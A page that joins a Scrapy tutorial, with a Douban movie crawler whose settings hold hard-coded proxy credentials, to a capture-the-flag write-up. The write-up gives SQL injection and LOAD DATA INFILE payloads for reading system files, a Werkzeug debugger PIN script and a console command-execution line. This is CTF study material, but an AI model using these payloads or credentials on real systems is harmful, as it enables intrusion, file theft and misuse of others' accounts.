Scrapy, a popular crawler framework
Being a framework, it lets you scrape quickly with only a small amount of code.
Modules: the downloader (request) module, the spider module (hand-written), the scheduler module, the pipeline module for saving data (hand-written), and the engine.
Each module interacts only with the engine.
Create a Scrapy project
"""scrapy startproject myspider"""
Create a spider
"""scrapy genspider itcast itcast.cn"""
Run the spider
"""scrapy crawl itcast --nolog"""
Pagination: construct a Request object with the next page's url address
Carrying cookies directly
Simulating login
POST requests (these request patterns are sketched below)
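A minimal sketch of these request patterns, assuming placeholder URLs, form fields and cookie values (none of them come from the original notes):

import scrapy


class DemoSpider(scrapy.Spider):
    name = 'demo'
    allowed_domains = ['example.com']

    def start_requests(self):
        # simulated login: send a POST request carrying the login form data
        yield scrapy.FormRequest(
            url='http://example.com/login',
            formdata={'username': 'user', 'password': 'pass'},
            callback=self.parse_list,
        )

    def parse_list(self, response):
        # ... extract items from the current page here ...
        # pagination: build a Request for the next page and yield it back to the engine;
        # cookies can also be attached directly via the cookies= argument
        next_url = response.xpath('//a[@class="next"]/@href').extract_first()
        if next_url is not None:
            yield scrapy.Request(
                response.urljoin(next_url),
                callback=self.parse_list,
                cookies={'sessionid': 'xxx'},  # placeholder cookie
            )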
Middleware (named after whichever component it sits closest to)
Pre-processes request and response objects
Setting proxy IPs
Other per-request customisation
Middleware is written in the middlewares.py file; in practice you mostly write downloader middleware.
Downloader middleware
Spider middleware
How to use middleware: define a middleware class in middlewares.py
with the two methods process_request and process_response (sketched below).
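As a sketch (the class name is illustrative, not part of the original project), a downloader middleware with both hooks looks like this; it still has to be enabled in DOWNLOADER_MIDDLEWARES in settings.py:

class DemoDownloaderMiddleware(object):
    def process_request(self, request, spider):
        # called for every request before it reaches the downloader,
        # e.g. to set a random User-Agent or a proxy ip
        return None  # returning None lets the request continue through the chain

    def process_response(self, request, response, spider):
        # called for every response before it is handed to the spider
        return response  # must return a Response (or a new Request)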
What CrawlSpider does: it extracts links automatically according to rules.
Creating a CrawlSpider: scrapy genspider -t crawl tencent hr.tencent.com
Using rules in a CrawlSpider:
rules is a tuple or list containing Rule objects.
A Rule describes one rule and takes a LinkExtractor plus parameters such as callback and follow.
LinkExtractor: a link extractor that matches url addresses by regular expression or XPath.
callback: the callback that handles the responses of the urls extracted by the link extractor; it may be omitted, in which case those responses are not processed by any callback.
follow: whether the responses of the extracted urls are themselves run through the rules for further extraction; True means they are, False means they are not.
CrawlSpider is often used when the data to collect sits on a single page (see the sketch below).
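A minimal CrawlSpider sketch for the tencent example above; the allow= patterns and the callback are placeholders and depend on the actual site layout:

from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor


class TencentSpider(CrawlSpider):
    name = 'tencent'
    allowed_domains = ['hr.tencent.com']
    start_urls = ['https://hr.tencent.com/position.php']

    rules = (
        # extract detail-page links and handle their responses in parse_item
        Rule(LinkExtractor(allow=r'position_detail\.php'), callback='parse_item', follow=False),
        # extract pagination links; no callback, but keep following them through the rules
        Rule(LinkExtractor(allow=r'position\.php\?&start=\d+'), follow=True),
    )

    def parse_item(self, response):
        item = {}
        # ... extract fields from the detail page ...
        yield item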
1. Write an ordinary spider
(1) Create the project
(2) Define the target (the items)
(3) Create the spider
(4) Save the content
2. Convert it into a distributed spider
(1) Modify the spider
1. Import the distributed spider class from scrapy_redis
2. Inherit from that class
3. Comment out start_urls & allowed_domains
4. Set redis_key, from which the start urls are obtained
5. Configure __init__ to obtain the allowed domains
(2) Modify the settings file
Copy in the scrapy_redis configuration parameters (a sketch of the whole conversion follows below).
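A sketch of what the conversion might look like with scrapy_redis (the spider name, redis key and redis address are placeholders; the settings keys are the ones documented by scrapy_redis):

# spider file: inherit from the scrapy_redis distributed spider class
from scrapy_redis.spiders import RedisSpider


class MovieSpider(RedisSpider):
    name = 'movie'
    # start_urls and allowed_domains are commented out;
    # the start urls are pushed into this redis key instead
    redis_key = 'movie:start_urls'

    def __init__(self, *args, **kwargs):
        # obtain the allowed domains dynamically, e.g. from a -a domain=... argument
        domain = kwargs.pop('domain', '')
        self.allowed_domains = list(filter(None, domain.split(',')))
        super(MovieSpider, self).__init__(*args, **kwargs)

And in settings.py, the scrapy_redis configuration parameters:

DUPEFILTER_CLASS = "scrapy_redis.dupefilter.RFPDupeFilter"
SCHEDULER = "scrapy_redis.scheduler.Scheduler"
SCHEDULER_PERSIST = True
REDIS_URL = "redis://127.0.0.1:6379"
ITEM_PIPELINES = {
    'scrapy_redis.pipelines.RedisPipeline': 400,
}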
Back to the main topic: here is a walkthrough of a small Douban Top 250 crawler built with Scrapy.
items.py
import scrapy


class DoubanItem(scrapy.Item):
    # define the fields for your item here like:
    name = scrapy.Field()
middlewares.py
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/spider-middleware.html
import random
import base64

from scrapy import signals
from Douban.settings import USER_AGENT_LIST, PROXY_LIST


# a downloader middleware class: pick a random User-Agent for every request
class RandomUserAgent(object):
    def process_request(self, request, spider):
        # print(request.headers['User-Agent'])
        ua = random.choice(USER_AGENT_LIST)
        request.headers['User-Agent'] = ua


# a downloader middleware class: route every request through a random proxy
class RandomProxy(object):
    def process_request(self, request, spider):
        proxy = random.choice(PROXY_LIST)
        print(proxy)
        if 'user_passwd' in proxy:
            # encode the credentials; in Python 3 base64 works on bytes, hence encode()
            b64_up = base64.b64encode(proxy['user_passwd'].encode())
            # set the proxy authentication header
            request.headers['Proxy-Authorization'] = 'Basic ' + b64_up.decode()
            # set the proxy
            request.meta['proxy'] = proxy['ip_port']
        else:
            # set the proxy (no authentication required)
            request.meta['proxy'] = proxy['ip_port']
pipelines.py
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html


class DoubanPipeline(object):
    def process_item(self, item, spider):
        return item
settings.py
# -*- coding: utf-8 -*-
# Scrapy settings for Douban project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'Douban'
SPIDER_MODULES = ['Douban.spiders']
NEWSPIDER_MODULE = 'Douban.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'
USER_AGENT_LIST = [
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 ",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 ",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 ",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 ",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre ",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Beamrise/17.2.0.9 Chrome/17.0.939.0 Safari/535.8 ",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba"
]
PROXY_LIST =[
{"ip_port": "123.207.53.84:16816", "user_passwd": "morganna_mode_g:ggc22qxp"},
# {"ip_port": "122.234.206.43:9000"},
]
# Obey robots.txt rules
# ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'Douban.middlewares.DoubanSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
DOWNLOADER_MIDDLEWARES = {
# 'Douban.middlewares.MyCustomDownloaderMiddleware': 543,
# 'Douban.middlewares.RandomUserAgent': 543,
'Douban.middlewares.RandomProxy': 543,
}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'Douban.pipelines.DoubanPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
movie.py
# -*- coding: utf-8 -*-
import scrapy
from Douban.items import DoubanItem


class MovieSpider(scrapy.Spider):
    name = 'movie'
    allowed_domains = ['douban.com']
    start_urls = ['https://movie.douban.com/top250']

    def parse(self, response):
        print(response.request.headers['User-Agent'])
        movie_list = response.xpath('//*[@id="content"]/div/div[1]/ol/li/div/div[2]')
        # print(len(movie_list))
        for movie in movie_list:
            item = DoubanItem()
            item['name'] = movie.xpath('./div[1]/a/span[1]/text()').extract_first()
            yield item
        # follow the "next page" link
        next_url = response.xpath('//*[@id="content"]/div/div[1]/div[2]/span[3]/a/@href').extract_first()
        if next_url is not None:
            next_url = response.urljoin(next_url)
            yield scrapy.Request(url=next_url)
Finally, cd into the project directory and run:
"""scrapy crawl movie --nolog"""
Original: https://blog.csdn.net/weixin_53227758/article/details/119080482
Author: 小赵呢
Title: 初识scrapy,以及豆瓣爬虫实例 (Getting to know Scrapy, with a Douban crawler example)
Related reading
Title: oh-my-notepro
Key point: computing the Flask/Werkzeug debugger PIN
After logging in, testing shows that the note_id parameter is vulnerable to SQL injection.

%27union%20select%201,2,3,version(),(select%20group_concat(username,0x3a,password)%20from%20users);%23
This yields the usernames and passwords, but they are not of much use.

PIN code
The PIN can be used to log in to the debug console.

The PIN calculation script for Python 3.8 is given below; it needs the following pieces of information:
- username: the user name, readable from /etc/passwd
- modname: default value flask.app
- appname: default value Flask
- moddir: the absolute path of app.py inside the flask package (obtained from an error page)
- uuidnode: the MAC address of the current network interface as a decimal number; read the hexadecimal value from /sys/class/net/eth0/address and convert it to decimal
- machine_id: the docker machine id; read /etc/machine-id, /proc/sys/kernel/random/boot_id and /proc/self/cgroup, then concatenate either of the first two with the last one (see the sketch after this list)
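As a rough sketch of that concatenation (approximately what Werkzeug's get_machine_id() does on Linux; details vary slightly between Werkzeug versions):

machine_id = b""
# take /etc/machine-id if readable, otherwise fall back to the boot_id
for filename in ("/etc/machine-id", "/proc/sys/kernel/random/boot_id"):
    try:
        with open(filename, "rb") as f:
            value = f.readline().strip()
    except OSError:
        continue
    if value:
        machine_id += value
        break
# inside docker, append the container id: the part after the last '/' on the first cgroup line
try:
    with open("/proc/self/cgroup", "rb") as f:
        machine_id += f.readline().strip().rpartition(b"/")[2]
except OSError:
    pass
print(machine_id.decode())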
app.py path
It can be seen on the error page.

Read the MAC address
';create table bbb(name varchar(1000));load data local infile "/sys/class/net/eth0/address" into table ctf.bbb;%23
'union select 1,2,3,4,(select group_concat(name) from ctf.bbb);%23
Then convert the hexadecimal value to decimal:
print(int('0242ac120003',16))
Read /etc/machine-id
';create table machine(name varchar(1000));load data local infile "/etc/machine-id" into table ctf.machine;%23
'union select 1,2,3,4,(select GROUP_CONCAT(name) from ctf.machine)%23
Read /proc/self/cgroup
';create table cc(name varchar(1000));load data local infile "/proc/self/cgroup" into table ctf.cc;%23
'union select 1,2,3,4,(select group_concat(name) from ctf.cc);%23
Compute the PIN
import hashlib
from itertools import chain

probably_public_bits = [
    'ctf',  # username
    'flask.app',  # modname
    'Flask',  # appname
    '/usr/local/lib/python3.8/site-packages/flask/app.py'  # moddir: path of flask/app.py
]

private_bits = [
    '2485377957891',  # uuidnode: the MAC address as a decimal number
    '1cc402dd0e11d5ae18db04a6de87223d9cfbff4dca5ae8bd5f82dad5b7b30f43bc41fcde7cf41bdfa213e96595e05ff7'  # machine_id
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)
Get the flag
After obtaining the PIN, log in to the console and execute commands, e.g.:
__import__("os").popen("cmd").read()
Reference
Original: https://blog.csdn.net/shinygod/article/details/124329579
Author: succ3
Title: oh-my-notepro